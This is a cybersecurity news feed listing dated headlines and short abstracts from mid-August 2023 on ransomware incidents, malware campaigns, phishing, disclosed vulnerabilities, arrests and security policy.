August 19, 2023 – Attack
Germany’s National Bar Association Investigating Ransomware Attack Full Text
Abstract
The German Federal Bar (BRAK) Association discovered the attack on August 2. The group is an umbrella organization overseeing 28 regional bars across Germany and representing about 166,000 lawyers nationally and internationally.Cyware
August 19, 2023 – Malware
WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams Full Text
Abstract
Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that's engineered to conduct tech support scams. The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve next-stage JavaScript that redirects users to a browser locker (aka browlock). This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that's served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used. WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page. The cybersecurity firm...The Hacker News
August 19, 2023 – Ransomware
Cuba Ransomware Deploys New Tools to Target U.S. Critical Infrastructure Sector and IT Integrator in Latin America Full Text
Abstract
The group's toolkit includes custom and off-the-shelf parts, such as the BUGHATCH downloader and the Metasploit framework. The attacks often start with the compromise of valid credentials through a credentials reuse scheme or vulnerability exploits.Cyware
August 19, 2023 – Vulnerabilities
New Juniper Junos OS Flaws Expose Devices to Remote Attacks - Patch Now Full Text
Abstract
Networking hardware company Juniper Networks has released an "out-of-cycle" security update to address multiple flaws in the J-Web component of Junos OS that could be combined to achieve remote code execution on susceptible installations. The four vulnerabilities have a cumulative CVSS rating of 9.8, making them Critical in severity. They affect all versions of Junos OS on SRX and EX Series. "By chaining exploitation of these vulnerabilities, an unauthenticated, network-based attacker may be able to remotely execute code on the devices," the company said in an advisory released on August 17, 2023. The J-Web interface allows users to configure, manage, and monitor Junos OS devices. A brief description of the flaws is as follows - CVE-2023-36844 and CVE-2023-36845 (CVSS scores: 5.3) - Two PHP external variable modification vulnerabilities in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker toThe Hacker News
August 19, 2023 – Breach
Illinois Hospital Notifies Patients, Employees of Data Breach After Royal Gang Posting Full Text
Abstract
In late May, reports said the Royal ransomware gang had posted data from the organization on its leak site. As of May 23, the hospital had said it was still investigating the incident.Cyware
August 19, 2023 – Malware
Thousands of Android Malware Apps Using Stealthy APK Compression to Evade Detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unknown or unsupported compression methods to elude malware analysis. That's according to findings from Zimperium, which found 3,300 artifacts leveraging such compression algorithms in the wild. 71 of the identified samples can be loaded on the operating system without any problems. There is no evidence that the apps were available on the Google Play Store at any point in time, indicating that the apps were distributed through other means, typically via untrusted app stores or social engineering to trick the victims into sideloading them. The APK files use "a technique that limits the possibility of decompiling the application for a large number of tools, reducing the possibilities of being analyzed," security researcher Fernando Ortega said. "In order to do that, the APK (which is in essence a ZIP file), is using an unsupported decompression method." The advantage of such an approach is its abilitThe Hacker News
August 19, 2023 – Vulnerabilities
Update: Companies Respond to ‘Downfall’ Intel CPU Vulnerability Full Text
Abstract
AWS said its customers’ data and cloud instances are not affected by Downfall and no action is required. The cloud giant did note that it has “designed and implemented its infrastructure with protections against this class of issues”.Cyware
August 19, 2023 – Criminals
Ransomware Gang Threatens Raleigh Housing Authority Months After Devastating Attack Full Text
Abstract
A ransomware gang has started posting sensitive personal information connected to a devastating attack on the Raleigh Housing Authority (RHA) that disrupted the organization for weeks in May.Cyware
August 19, 2023 – Malware
Over 3,000 Android Malware spotted using unsupported/unknown compression methods to avoid detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unsupported compression methods to prevent malware analysis. On June 28th, researchers from Zimperium zLab observed that Joe Sandbox announced the availability of an Android APK that...Security Affairs
August 19, 2023 – Criminals
Update: Man Arrested in Northern Ireland Police Data Leak Full Text
Abstract
The unnamed man was questioned by detectives who were said to be "investigating criminality linked to last week's freedom of information data breach," but has now been released on bail to allow for further inquiries, the PSNI stated.Cyware
August 18, 2023 – Phishing
Cloaked Malvertising: Unmasking Complex Fingerprinting and Evading Detection Full Text
Abstract
Malwarebytes Labs identified a new trend in malvertising campaigns that use advanced cloaking techniques to evade detection. Threat actors are targeting the users of popular IT programs by creating malicious ads displayed on Google search results. To safeguard against ever-evolving malvertising tac...Cyware
August 18, 2023 – Criminals
14 Suspected Cybercriminals Arrested Across Africa in Coordinated Crackdown Full Text
Abstract
A coordinated law enforcement operation across 25 African countries has led to the arrest of 14 suspected cybercriminals, INTERPOL announced Friday. The exercise, conducted in partnership with AFRIPOL, enabled investigators to identify 20,674 cyber networks that were linked to financial losses of more than $40 million. "The four-month Africa Cyber Surge II operation was launched in April 2023 and focused on identifying cybercriminals and compromised infrastructure," the agency said. As part of the operation, three suspects were arrested in Cameroon in connection with an online scam involving the fraudulent sale of works of art worth $850,000. Another suspect was arrested in Nigeria for defrauding a Gambian victim. Also arrested were two money mules linked to scams initiated through messaging platforms. The cyber networks comprised 3,786 command-and-control (C2) servers, 14,134 victim IP addresses tied to data stealer infections, 1,415 phishing links and domains, 939The Hacker News
August 18, 2023 – Vulnerabilities
WinRAR flaw enables remote code execution of arbitrary code Full Text
Abstract
A flaw impacting the file archiver utility for Windows WinRAR can allow the execution of commands on a computer by opening an archive. WinRAR is a popular file compression and archival utility for Windows operating systems. The utility is affected...Security Affairs
August 18, 2023 – Phishing
Ongoing Phishing Campaign Targets Zimbra Credentials Full Text
Abstract
ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their Zimbra account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. S...Cyware
August 18, 2023 – Education
The Vulnerability of Zero Trust: Lessons from the Storm 0558 Hack Full Text
Abstract
While IT security managers in companies and public administrations rely on the concept of Zero Trust, APTs (Advanced Persistent Threats) are putting its practical effectiveness to the test. Analysts, on the other hand, understand that Zero Trust can only be achieved with comprehensive insight into one's own network. Just recently, an attack believed to be perpetrated by the Chinese hacker group Storm-0558 targeted several government agencies. They used fake digital authentication tokens to access webmail accounts running on Microsoft's Outlook service. In this incident, the attackers stole a signing key from Microsoft, enabling them to issue functional access tokens for Outlook Web Access (OWA) and Outlook.com and to download emails and attachments. Due to a plausibility check error, the digital signature, which was only intended for private customer accounts (MSA), also worked in the Azure Active Directory for business customers. Embracing the Zero Trust Revolution AccThe Hacker News
August 18, 2023 – Hacker
#OpFukushima: Anonymous group protests against the plan to dump Fukushima RADIOACTIVE wastewater into Pacific Full Text
Abstract
#OpFukushima: The famous collective Anonymous has launched cyberattacks against Japan nuclear websites over Fukushima water plan. The hacker collective Anonymous has launched cyberattacks against nuclear power-linked groups in Japan as part of an operation...Security Affairs
August 18, 2023 – Phishing
Behind WoofLocker: Long-running Traffic Diversion Scheme Full Text
Abstract
The long-standing WoofLocker tech support scam campaign, initiated in 2017, remains active with enhanced resilience as it employs a unique traffic redirection approach on compromised websites. Redirecting targeted users to a fake virus warning browser locker screen, WoofLocker has exhibited stabili...Cyware
August 18, 2023 – Attack
New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft Full Text
Abstract
A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. "Initially, the target receives an email with a phishing page in the attached HTML file," ESET researcher Viktor Šperka said in a report. "The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file." The messages also spoof the from address to appear as if they are coming from a Zimbra administrator in a likely attempt to convince the recipients into opening the attachment. The HTML file contains a Zimbra loThe Hacker News
August 18, 2023 – Phishing
Massive phishing campaign targets users of the Zimbra Collaboration email server Full Text
Abstract
A massive social engineering campaign is targeting users of the Zimbra Collaboration email server to steal their login credentials. ESET researchers uncovered a mass-spreading phishing campaign targeting users of the Zimbra Collaboration email server...Security Affairs
August 18, 2023 – Phishing
Catching up With Wooflocker, the Most Elaborate Traffic Redirection Scheme to Tech Support Scams Full Text
Abstract
The WoofLocker tech support scam campaign, which was first discovered in 2020, is still active and has evolved to become more sophisticated. The campaign relies on compromised websites to distribute its malicious code, with a focus on adult websites.Cyware
August 18, 2023 – Ransomware
New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools Full Text
Abstract
Microsoft on Thursday disclosed that it found a new version of the BlackCat ransomware (aka ALPHV and Noberus) that embeds tools like Impacket and RemCom to facilitate lateral movement and remote code execution. "The Impacket tool has credential dumping and remote service execution modules that could be used for broad deployment of the BlackCat ransomware in target environments," the company's threat intelligence team said in a series of posts on X (formerly Twitter). "This BlackCat version also has the RemCom hacktool embedded in the executable for remote code execution. The file also contains hardcoded compromised target credentials that actors use for lateral movement and further ransomware deployment." RemCom, billed as an open-source alternative to PsExec, has been put to use by Chinese and Iranian nation-state threat actors like Dalbit and Chafer (aka Remix Kitten) to move across the victim environments in the past. Redmond said it startedThe Hacker News
August 18, 2023 – Policy and Law
Africa Cyber Surge II law enforcement operation has led to the arrest of 14 suspects Full Text
Abstract
An international law enforcement operation across 25 African countries has led to the arrest of 14 cybercriminals. A coordinated law enforcement operation conducted by INTERPOL and AFRIPOL across 25 African countries has led to the arrest of 14 suspected...Security Affairs
August 18, 2023 – Attack
Cleveland City School District Suffers Ransomware Attack Full Text
Abstract
Cleveland City Schools say they are dealing with the aftermath of a ransomware attack Tuesday. They say less than 5% of faculty and staff devices were affected. A CCS spokesperson says their printers are down.Cyware
August 18, 2023 – Solution
Google Chrome’s New Feature Alerts Users About Auto-Removal of Malicious Extensions Full Text
Abstract
Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store. The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware. The tech giant said it intends to highlight such extensions under a "Safety check" category in the "Privacy and security" section of the browser settings page. "When a user clicks 'Review,' they will be taken to their extensions and given the choice to either remove the extension or hide the warning if they wish to keep the extension installed," Oliver Dunk, a developer relations engineer for Chrome extensions, said. "As in previous versions of Chrome, extensions marked as malware are automatically disabled." The development comes as the cThe Hacker News
August 18, 2023
Bronze Starlight targets the Southeast Asian gambling sector Full Text
Abstract
Experts warn of an ongoing campaign attributed to China-linked Bronze Starlight that is targeting the Southeast Asian gambling sector. SentinelOne observed China-linked APT group Bronze Starlight (aka APT10, Emperor Dragonfly or Storm-0401) targeting...Security Affairs
August 18, 2023 – Education
Security Basics Aren’t So Basic — They’re Hard Full Text
Abstract
Fundamental defenses — identity and access management, MFA, memory-safe languages, patching and vulnerability management — are lacking or nonexistent across the economy, according to cybersecurity experts.Cyware
August 18, 2023 – Hacker
Chinese Hackers Accused of Targeting Southeast Asian Gambling Sector Full Text
Abstract
Hackers based in China are targeting the gambling sector across Southeast Asia in a campaign that researchers say is closely related to data collection and surveillance operations identified earlier this year.Cyware
August 17, 2023 – Vulnerabilities
NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security Full Text
Abstract
A previously undetected attack method called NoFilter has been found to abuse the Windows Filtering Platform (WFP) to achieve privilege escalation in the Windows operating system. "If an attacker has the ability to execute code with admin privilege and the target is to perform LSASS Shtinkering, these privileges are not enough," Ron Ben Yizhak, a security researcher at Deep Instinct, told The Hacker News. "Running as 'NT AUTHORITY\SYSTEM' is required. The techniques described in this research can escalate from admin to SYSTEM." The findings were presented at the DEF CON security conference over the weekend. The starting point of the research is an in-house tool called RPC Mapper the cybersecurity company used to map remote procedure call (RPC) methods, specifically those that invoke WinAPI, leading to the discovery of a method named "BfeRpcOpenToken," which is part of WFP. WFP is a set of API and system services that'sThe Hacker News
August 17, 2023
APT29 is targeting Ministries of Foreign Affairs of NATO-aligned countries Full Text
Abstract
Russia-linked APT29 used the Zulip Chat App in attacks aimed at ministries of foreign affairs of NATO-aligned countries EclecticIQ researchers uncovered an ongoing spear-phishing campaign conducted by Russia-linked threat actors targeting Ministries...Security Affairs
August 17, 2023 – Hacker
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons Full Text
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin. This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a trojaThe Hacker News
August 17, 2023 – Phishing
A massive campaign delivered a proxy server application to 400,000 Windows systems Full Text
Abstract
Researchers discovered a massive campaign that delivered a proxy server application to at least 400,000 Windows systems. AT&T Alien Labs researchers uncovered a massive campaign that delivered a proxy server application to at least 400,000 Windows...Security Affairs
August 17, 2023 – Vulnerabilities
New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode Full Text
Abstract
Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device even when the victim believes it is offline. The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial Airplane Mode which edits the UI to display Airplane Mode icon and cuts internet connection to all apps except the attacker application," Jamf Threat Labs researchers Hu Ke and Nir Avraham said in a report shared with The Hacker News. Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages. The approach devised by Jamf, in a nutshell, provides an illusion to the user that the Airplane Mode isThe Hacker News
August 17, 2023 – General
Alarming lack of cybersecurity practices on world’s most popular websites Full Text
Abstract
The world’s most popular websites lack basic cybersecurity hygiene, an investigation by Cybernews shows. Do you happen to love exploring DIY ideas on Pinterest? Scrolling through IMDB to pick the next movie to watch? Or simply scrolling through...Security Affairs
August 17, 2023 – Vulnerabilities
New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities Full Text
Abstract
A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "Furthermore, the attacker abused a legitimate service, TryCloudflare, to obfuscate their C2 network." Proxyjacking allows the attacker to rent the compromised host out to a proxy network, making it possible to monetize the unused bandwidth. Cryptojacking, on the other hand, refers to the abuse of the system resources to mine cryptocurrency. A notable aspect of the campaign is the use of compiled binaries written in Go and .NET to fly under the radar, with LABRAT also providing backdoor access to the infected systems.The Hacker News
August 17, 2023 – Vulnerabilities
Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode Full Text
Abstract
Researchers detailed a new exploit for Apple iOS 16 that can allow attackers to gain access to a device even when the victim believes it is in Airplane Mode. Jamf Threat Labs researchers developed a post-exploit persistence technique on iOS 16 that...Security Affairs
August 17, 2023 – Outage
Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack Full Text
Abstract
Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household...Security Affairs
August 11, 2023 – Vulnerabilities
Magento Shopping Cart Attack Targets Critical Vulnerability Full Text
Abstract
Security researchers at Akamai say they have identified a server-side template injection campaign aimed at Magento 2 shops that have yet to address CVE-2022-24086, an input validation flaw with a CVSS score of 9.8.Cyware
August 11, 2023 – Attack
Researchers Uncover Years-Long Cyber Espionage on Foreign Embassies in Belarus Full Text
Abstract
A hitherto undocumented threat actor operating for nearly a decade and codenamed MoustachedBouncer has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus. "Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu Faou said, describing the group as skilled and advanced. The adversary, active since at least 2014, is assessed to be aligned with Belarusian interests, likely employing a lawful interception system such as SORM to conduct its AitM attacks as well as deploy disparate tools called NightClub and Disco. Both the Windows malware frameworks support additional spying plugins including a screenshotter, an audio recorder, and a file stealer. The oldest sample of NightClub dates back to November 19, 2014, when it was uploaded to VirusTotal from Ukraine. Embassy staff from four differThe Hacker News
August 11, 2023 – Education
The Evolution of API: From Commerce to Cloud Full Text
Abstract
API (or Application Programming Interface) is a ubiquitous term in the tech community today, and it’s one with a long history. As a concept, APIs (or Application Programming Interfaces) have been around since the 1950s. What started out as a potential...Security Affairs
August 11, 2023 – Attack
Charming Kitten Hackers Target Iranian Dissidents in Germany Full Text
Abstract
The Federal Office for the Protection of the Constitution (BfV) reported it had found concrete attempts by the group known as Charming Kitten to target the Iranian opposition and exiles based in Germany.Cyware
August 11, 2023 – Encryption
Enhancing TLS Security: Google Adds Quantum-Resistant Encryption in Chrome 116 Full Text
Abstract
Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116. "Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS, starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday. Kyber was chosen by the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) as the candidate for general encryption in a bid to tackle future cyber attacks posed by the advent of quantum computing. Kyber-768 is roughly the security equivalent of AES-192. The encryption algorithm has already been adopted by Cloudflare, Amazon Web Services, and IBM. X25519Kyber768 is a hybrid algorithm that combines the output of X25519, an elliptic curve algorithm widely used for key agreement in TLS, and Kyber-768 to create a strong session key to encrypt TLS connections. "Hybrid mechanismThe Hacker News
August 11, 2023 – Botnet
Gafgyt botnet is targeting EoL Zyxel routers Full Text
Abstract
Researchers warn that the Gafgyt botnet is actively exploiting a vulnerability impacting the end-of-life Zyxel P660HN-T1A router. A variant of the Gafgyt botnet is actively attempting to exploit a vulnerability, tracked as CVE-2017-18368 (CVSS v3: 9.8),...Security Affairs
August 11, 2023 – Government
Ukrainian Official Touts Country’s Wartime Cyber Intelligence Efforts Full Text
Abstract
Intelligence gathered in cyberspace is helping Ukraine understand Russia's plans and stop the enemy from carrying them out, according to the country’s top cyber and information security official.Cyware
August 11, 2023
Researchers Shed Light on APT31’s Advanced Backdoors and Data Exfiltration Tactics Full Text
Abstract
The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe in 2022. "The attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems," Kaspersky said in an analysis spotlighting APT31's previously undocumented tradecraft. The intrusions employ a three-stage malware stack, each focused on disparate aspects of the attack chain: setting up persistence, gathering sensitive data, and transmitting the information to a remote server under the threat actor's control. Some variants of the second-stage backdoors also come with features designed to look up file names in the MicrosoThe Hacker News
August 11, 2023
Charming Kitten APT is targeting Iranian dissidents in Germany Full Text
Abstract
Germany’s Federal Office for the Protection of the Constitution (BfV) warns that the Charming Kitten APT group targeted Iranian dissidents in the country. The Federal Office for the Protection of the Constitution (BfV) is warning that an alleged...Security Affairs
August 11, 2023 – Policy and Law
India Passes Data Protection Legislation in Parliament. Critics Fear Privacy Violation Full Text
Abstract
Indian lawmakers Wednesday approved a data protection legislation that “seeks to better regulate big tech firms and penalize companies for data breaches” as several groups expressed concern over citizens’ privacy rights.Cyware
August 11, 2023 – Attack
New SystemBC Malware Variant Targets Southern African Power Company Full Text
Abstract
An unknown threat actor has been linked to a cyber attack on a power generation company in southern Africa with a new variant of the SystemBC malware called DroxiDat as a precursor to a suspected ransomware attack. "The proxy-capable backdoor was deployed alongside Cobalt Strike Beacons in a South African nation's critical infrastructure," Kurt Baumgartner, principal security researcher at Kaspersky's Global Research and Analysis Team (GReAT), said. The Russian cybersecurity company said the attack, which took place in late March 2023, was in its early stages and involved the use of DroxiDat to profile the system and proxy network traffic using the SOCKS5 protocol to and from command-and-control (C2) infrastructure. SystemBC is a C/C++-based commodity malware and remote administrative tool that was first seen in 2019. Its main feature is to set up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel malicious traffic associThe Hacker News
August 11, 2023 – Criminals
California City Investigating Data Theft After Ransomware Group’s Claims Full Text
Abstract
The LockBit gang added 15 victims to its leak site on Wednesday including El Cerrito, which is home to more than 25,000 residents and is about 10 minutes north of Oakland.Cyware
August 11, 2023 – Vulnerabilities
16 New CODESYS SDK Flaws Expose OT Environments to Remote Attacks Full Text
Abstract
A set of 16 high-severity security flaws have been disclosed in the CODESYS V3 software development kit (SDK) that could result in remote code execution and denial-of-service under specific conditions, posing risks to operational technology (OT) environments. The flaws, tracked from CVE-2022-47378 through CVE-2022-47393 and dubbed CoDe16, carry a CVSS score of 8.8 with the exception of CVE-2022-47391, which has a severity rating of 7.5. Twelve of the flaws are buffer overflow vulnerabilities. "Exploitation of the discovered vulnerabilities, which affect all versions of CODESYS V3 prior to version 3.5.19.0, could put operational technology (OT) infrastructure at risk of attacks, such as remote code execution (RCE) and denial-of-service (DoS)," Vladimir Tokarev of the Microsoft Threat Intelligence Community said in a report. While a successful weaponization of the flaws requires user authentication as well as an in-depth knowledge of the proprietary protocol of CODESYThe Hacker News
August 11, 2023 – Government
CISA Adds Microsoft .NET Vulnerability to KEV Catalog Due to Active Exploitation Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched security flaw in Microsoft's .NET and Visual Studio products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-38180 (CVSS score: 7.5), the high-severity flaw relates to a case of denial-of-service (DoS) impacting .NET and Visual Studio. It was addressed by Microsoft as part of its August 2023 Patch Tuesday updates shipped earlier this week, tagging it with an "Exploitation More Likely" assessment. While exact details surrounding the nature of exploitation are unclear, the Windows maker has acknowledged the existence of a proof-of-concept (PoC) in its advisory. It also said that attacks leveraging the flaw can be pulled off without any additional privileges or user interaction. "Proof-of-concept exploit code is available, or an attack demonstration is not practical for most systems," the companyThe Hacker News
August 10, 2023 – Business
Sweet Security Raises $12M Seed Round for its Cloud Security Suite Full Text
Abstract
The $12 million seed round was led by Glilot Capital Partners, with participation from CyberArk Ventures and a number of angel investors including Gerhard Eschelbeck, a former CISO at Google, and Travis McPeak, who led product security at Databricks.Cyware
August 10, 2023 – Attack
New Attack Alert: Freeze[.]rs Injector Weaponized for XWorm Malware Attacks Full Text
Abstract
Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments. The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated via a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was first documented by Morphisec in May 2022. "This file redirects to an HTML file and utilizes the 'search-ms' protocol to access an LNK file on a remote server," security researcher Cara Lin said. "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions." Freeze[.]rs, released on May 4, 2023, is an open-source red teaming tool from Optiv that functions as a payload creation tool used for circumventing security solutions and executing shellcode in a stealthy manner. "Freeze[.]rs utilizes multiple tecThe Hacker News
August 10, 2023 – Malware
Statc Stealer, a new sophisticated info-stealing malware Full Text
Abstract
Experts warn that a new info-stealer named Statc Stealer is infecting Windows devices to steal a broad range of sensitive information. Zscaler ThreatLabz researchers discovered a new information stealer malware, called Statc Stealer, that...Security Affairs
August 10, 2023 – Vulnerabilities
Forty Vulnerabilities Patched in Android With August 2023 Security Updates Full Text
Abstract
“Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible,” Google noted in its security bulletin.Cyware
August 10, 2023 – Malware
New Statc Stealer Malware Emerges: Your Sensitive Data at Risk Full Text
Abstract
A new information-stealing malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information. "Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week. "It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram." Written in C++, the malicious stealer finds its way into victim systems when potential victims are tricked into clicking on seemingly innocuous ads, with the stealer imitating an MP4 video file format on web browsers like Google Chrome. The first-stage payload, while dropping and executing a decoy PDF installer, also stealthily deploys a downloaderThe Hacker News
August 10, 2023 – Government
CISA discovered a new backdoor, named Whirlpool, used in Barracuda ESG attacks Full Text
Abstract
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) observed a new backdoor, named Whirlpool, in attacks on Barracuda ESG appliances. The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has discovered a new backdoor,...Security Affairs
August 10, 2023 – Criminals
IRS Confirms Takedown of Bulletproof Hosting Provider Lolek Full Text
Abstract
A popular bulletproof hosting platform was taken down by authorities in the U.S. and Poland this week, marking the latest effort to limit the anonymous access cybercriminals have to critical tools.Cyware
August 10, 2023 – Vulnerabilities
Emerging Attacker Exploit: Microsoft Cross-Tenant Synchronization Full Text
Abstract
Attackers continue to target Microsoft identities to gain access to connected Microsoft applications and federated SaaS applications. Additionally, attackers continue to progress their attacks in these environments, not by exploiting vulnerabilities, but by abusing native Microsoft functionality to achieve their objective. The attacker group Nobelium, linked with the SolarWinds attacks, has been documented using native functionality like the creation of Federated Trusts [1] to enable persistent access to a Microsoft tenant. This article demonstrates an additional native functionality that when leveraged by an attacker enables persistent access to a Microsoft cloud tenant and lateral movement capabilities to another tenant. This attack vector enables an attacker operating in a compromised tenant to abuse a misconfigured Cross-Tenant Synchronization (CTS) configuration and gain access to other connected tenants or deploy a rogue CTS configuration to maintain persistence within the teThe Hacker News
August 10, 2023 – Government
CISA adds actively exploited flaw in .NET, Visual Studio to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added zero-day vulnerability CVE-2023-38180 affecting .NET and Visual Studio to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added an actively exploited zero-day vulnerability CVE-2023-38180...Security Affairs
August 10, 2023 – Vulnerabilities
Adobe Patches 30 Acrobat, Reader Vulnerabilities on Patch Tuesday Full Text
Abstract
Adobe on Tuesday rolled out a big batch of security updates for its flagship Acrobat and Reader software, patching at least 30 vulnerabilities affecting Windows and macOS installations.Cyware
August 10, 2023 – Vulnerabilities
Encryption Flaws in Popular Chinese Language App Put Users’ Typed Data at Risk Full Text
Abstract
A widely used Chinese language input app for Windows and Android has been found vulnerable to serious security flaws that could allow a malicious interloper to decipher the text typed by users. The findings come from the University of Toronto's Citizen Lab, which carried out an analysis of the encryption mechanism used in Tencent's Sogou Input Method, an app that has over 455 million monthly active users across Windows, Android, and iOS. The vulnerabilities are rooted in EncryptWall, the service's custom encryption system, allowing network eavesdroppers to extract the textual content and access sensitive data. "The Windows and Android versions of Sogou Input Method contain vulnerabilities in this encryption system, including a vulnerability to a CBC padding oracle attack, which allow network eavesdroppers to recover the plaintext of encrypted network transmissions, revealing sensitive information including what users have typed," the researchers said. CBC, sThe Hacker News
August 10, 2023 – Government
US Govt launches Artificial Intelligence Cyber Challenge Full Text
Abstract
The US Government House this week launched an Artificial Intelligence Cyber Challenge competition for creating a new generation of AI systems. On Wednesday, the United States Government House introduced an Artificial Intelligence Cyber Challenge competition....Security Affairs
August 10, 2023 – Breach
Update: The MOVEit Spree is as Bad as — or Worse Than — You Think It Is Full Text
Abstract
The mass exploit of a zero-day vulnerability in MOVEit has compromised more than 600 organizations and 40 million individuals to date, but the numbers mask a more disastrous outcome that’s still unfolding.Cyware
August 10, 2023 – Phishing
Cybercriminals Increasingly Using EvilProxy Phishing Kit to Target Executives Full Text
Abstract
Threat actors are increasingly using a phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy to pull off account takeover attacks aimed at high-ranking executives at prominent companies. According to Proofpoint, an ongoing hybrid campaign has leveraged the service to target thousands of Microsoft 365 user accounts, sending approximately 120,000 phishing emails to hundreds of organizations worldwide between March and June 2023. Nearly 39% of the hundreds of compromised users are said to be C-level executives, including CEOs (9%) and CFOs (17%). The attacks have also singled out personnel with access to financial assets or sensitive information. At least 35% of all compromised users had additional account protections enabled. The campaigns are seen as a response to the increased adoption of multi-factor authentication (MFA) in enterprises, prompting threat actors to evolve their tactics to bypass new security layers by incorporating adversary-in-the-middle (AitM) phishing kits toThe Hacker News
August 10, 2023 – Breach
Data of all serving police officers Police Service of Northern Ireland (PSNI) mistakenly published online Full Text
Abstract
Police Service of Northern Ireland (PSNI) mistakenly shared sensitive data of all 10,000 serving police officers in response to a FOI request. The Police Service of Northern Ireland (PSNI) has mistakenly shared sensitive data of all 10,000 serving...Security Affairs
August 10, 2023 – Government
NIST Releases Draft Overhaul of Its Core Cybersecurity Framework Full Text
Abstract
The National Institute of Standards and Technology released a long-anticipated draft version of the Cybersecurity Framework 2.0 Tuesday, the first major update of the agency’s risk guidance since 2014.Cyware
August 10, 2023 – Criminals
Interpol Busts Phishing-as-a-Service Platform ‘16Shop,’ Leading to 3 Arrests Full Text
Abstract
